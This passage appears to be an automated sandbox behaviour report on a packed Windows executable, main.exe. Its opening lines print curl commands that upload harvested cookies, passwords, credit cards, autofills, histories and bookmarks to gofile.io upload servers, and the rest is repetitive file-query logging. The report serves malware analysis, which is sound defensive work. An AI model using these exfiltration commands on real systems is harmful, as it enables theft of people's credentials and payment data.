Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -f "file=@c:\users\user\appdata\local\tempprysmax-910646\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store2', 'zone': 'eu'}].gofile.io/contents/uploadfileJump to behavior
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA6A7E0 cpuid 0_2_00007FF6ABA6A7E0
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\certifi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info\licenses VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\certifi VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\h2-4.1.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3-x64.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libffi-8.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\libssl-3.dll VolumeInformationJump to behavior
